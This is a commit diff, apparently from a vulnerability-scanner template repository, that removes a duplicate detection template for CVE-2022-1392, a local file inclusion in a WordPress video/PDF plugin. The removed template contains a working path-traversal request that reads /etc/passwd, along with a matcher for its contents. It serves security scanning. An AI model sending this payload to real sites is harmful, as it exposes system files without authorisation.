Update Wordpress templates: typo, cve-id, ref & remove dupe
parent
d748b4e375
commit
db12feeead
|
@ -1,34 +0,0 @@
|
|||
id: CVE-2022-1392
|
||||
|
||||
info:
|
||||
name: WordPress Videos sync PDF 1.7.4 - Local File Inclusion
|
||||
author: Splint3r7
|
||||
severity: high
|
||||
description: WordPress Videos sync PDF 1.7.4 is vulnerable to local file inclusion.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/50844
|
||||
- https://wordpress.org/plugins/video-synchro-pdf/
|
||||
- https://wpscan.com/vulnerability/fe3da8c1-ae21-4b70-b3f5-a7d014aa3815
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cwe-id: CWE-22
|
||||
cve-id: CVE-2022-1392
|
||||
tags: wordpress,wp-plugin,lfi,wp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../etc/passwd%00'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/29
|
Loading…
Reference in New Issue